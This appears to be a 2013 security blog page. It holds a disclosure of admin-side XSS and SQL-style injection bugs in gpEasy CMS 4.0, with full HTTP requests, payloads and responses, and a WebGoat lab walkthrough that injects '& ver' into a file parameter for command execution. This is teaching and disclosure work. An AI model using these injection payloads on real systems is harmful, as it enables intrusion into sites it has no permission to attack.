Hi,
there is a new release of gpEasy CMS. This release has number 4.0.
I decide to post it here too.
Of course all vulnerable parts of this CMS are located in part dedicated to logged-in admin,
so maybe you should consider it as a low-level vulnerabilities (... csrf? ;) ).
Anyway, maybe few of you will find it interesting.
I should mention here, that gpEasy Team is developing better and better filters,
so we will see what they'll do in next version.
Here we go:
First one detailed below is XSS vulnerability.
Simple <script> tag is filtered out. Anyway this can be cheated like that:
---request---
POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache
cmd=new_section&file=aaaaaaaaaaaa&type=<h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbbbbbb</h1>&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area
---request---
and we will see at the response sourcecode that our payload was added correctly:
---response---
(...)
>Delete</a></td></tr><tr class=\"even\"><td style=\"white-space:nowrap\">aaaaaaaaaa
aa</td><td><h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbb
bbbb</h1></td><td>\"<span class=\"admin_note\">New Section</span>...\"</td>
<td style=\"white-space:nowrap\"><a href=\"/kuba/gpEasy4.0/
(...)
---response---
similar situation in other place:
---request---
POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache
cmd=new_section&file=aaaaaaaaaaaa&type='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area
---request---
Response will be similar.
Another situation when we have a little vuln is described below.
Durning some tests I found that gpEasy is presenting full path do wwwroot.
Check it out:
POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&jsoncallback=jQuery183008074821283823352_1369418498905 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache
title=My+gpEasy+CMS&keywords=gpEasy+CMS%2C+Easy+CMS%2C+Content+Management%2C+PHP%2C+Free+CMS%2C+Website+builder%2C+Open+Source&desc=A+new+gpEasy+CMS+installation.+You+can+change+your+site's+description+in+the+configuration.&colorbox_style=example1&language=en&langeditor=inherit&showsitemap=false&showsitemap=true&showlogin=false&showlogin=true&showgplink=false&showgplink=true&jquery=local&maximgarea=691200&maxthumbsize=100&auto_redir=90&HTML_Tidy='%2bOR%2b1%3d1--&Report_Errors=false&combinejs=false&combinejs=true&combinecss=false&combinecss=true&etag_headers=false&etag_headers=true&resize_images=false&resize_images=true&toemail=admin%40here.com&toname=&from_address=AutomatedSender%40192.168.1.101&from_name=Automated+Sender&from_use_user=false&require_email=&mail_method=mail&sendmail_path=&smtp_hosts=&smtp_user=&smtp_pass=&recaptcha_public=&recaptcha_private=&recaptcha_language=inherit&cmd=save_config&verified=95027f35b0&verified=95027f35b0&aaa=Save
Response for this one looks like this:
---response---
HTTP/1.0 500 Internal Server Error
Date: Fri, 24 May 2013 18:07:02 GMT
(...)
Content-Type: text/html; charset=utf-8
<p>Oops, an error occurred while generating this page.<p><h3>Error Details</h3><pre>array(
[type] => (integer)4
[message] => (string)syntax error, unexpected ''in' (T_ENCAPSED_AND_WHITESPACE)
[file] => (string)/home/kuba/public_html/gpEasy4.0/gpEasy/data/_site/config.php
[line] => (integer)92
[request] => (string)/kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&jsoncallback=jQuery183008074821283823352_1369418498905
[time] => (integer)1369418822
[request_method] => (string)POST
[file_modified] => (integer)1369418822
[file_size] => (integer)3082
)</pre><p><a href="">Reload this page</a></p><p style="font-size:90%">Note: Error details are only displayed for logged in administrators</p>
---response---
HTML_TidypParameter is vulnerable, but if you want - you should test it again by yourself,
because I think it could be similar bug to that one I found in Drupal:
if you will send 'too much requests' to webapp, it will simple crash it (and error will be presented).
Thanks to gpEasy Team for a fast reply. Good job!
Cheers o/
Sunday, 26 May 2013
Thursday, 23 May 2013
[EN] Remote Code Execution - WebGoat lesson
WebGoat v5.4:
1. Injection Flaws
1.1 Command Injection:
Welcome
again in OWASP WebGoat lessons! After log in (webgoat:webgoat) we will go again
to ‘Injection Flaws’ and this time to ‘Command Injection’.
In our
browser, we should switch now to Burp proxy (127.0.0.1:8080) to prepare our
requests/responses for Burp to edit. (If we can – we can use for this excersise
Data Tamper too – you will find it at Mozilla.org.)
While you’re
in ‘Command Injection’ lesson, you can see that we must do here a little
injection in parameter made for ‘reading files’ from local storage.
Ok. Now
we must set ‘Intercept’ to ‘On’ in our Burp.
In the
screen above, in red frame we have selected place which we will explore. Also
we see a little ‘hint’ (selected by red frame too – starting from „ExecResults for…”.
Now we’re
able to see how ‘file reading’ is done here. We can assume that this ‘place’ is
created like a system() command fromPHP, let’s say, it’s something similar to:
(…)
system(‘cmd.exe /c type
„C:\Users\...\lesson_plans\English\BasicAuthentication.html”’);
(…)
(Quotation
mark and apostrophes ends path to file, we must pay attention to this place.)
Now (with
‘Intercept = On’) we can send to our webapp (WebGoat) ‘command’ to read one of selected
file. Burp will
catch this request, and now we should send it to ‘Repeater’:
Parameter
„HelpFile” allows us to specify a file name to ‘read’ (by cmd.exe in this
case). No user-input
filtering (in this scenario: in ‘give me name of file to read’ parameter)
allows to add ‘other (any) characters’.
So: after
a name (of … .help) file, we can add another (and another…) command – remember how
syntax should be builded (first red-frame).
To successfully
make this attack and add ‘our command’ to command ‘read-file’ we must use
URL-encoding because Windows is using “&” to connect commands (like | or ; in
*nix/Linux).
Webapps use this sign (&) to separate from each other parameters. To avoid confusion here, we will now go to ‘Decoder’
cart in Burp. We should do few steps: “close” cmd.exe (read file X) in way,
when we can add another (our) command. Let’s use ‘ver’ command from Windows.
If our
case is:
(…)\lesson_plans\English\AccessControlMatrix.html" ' (remember about „ and ‘ ).
Our ‘payload’
should be “somewhere” between „ and ‘ sign.
Ok, in
Decoder (Burp) let’s try: ” & ver
and (on the right side
of the window, select now )
‘Encode as’ and choose ‘URL-encode’ method (to change alphabetic to equivalent in
URL-encoding schema.
Vulnerability
in this lesson, works like this: we can add another command (and another one –
could be wrong – to finisz the statement; you will se below). I added few
commands because in case that WebGoat will ‘miss the last command’ – I want to
do ‘more’ commands, even if last one will not work. It won’t be important,
vuln is right now exploited).
Now switch
to ‘Repeater’ cart in Burp, and in a ‘HelpFile’ filename, let’s paste our
URL-encoded value:
Click ‘Go’
to watch the response in window below.
Ok. Now
click ‘show response in browser’ to see this (source code) response in browser.
Looks like that we already exploited RCE vulnerability. :)
Congrats! ;)
And remember to use your knowledge only in legal projects ;)
Cheers o/
Subscribe to:
Posts (Atom)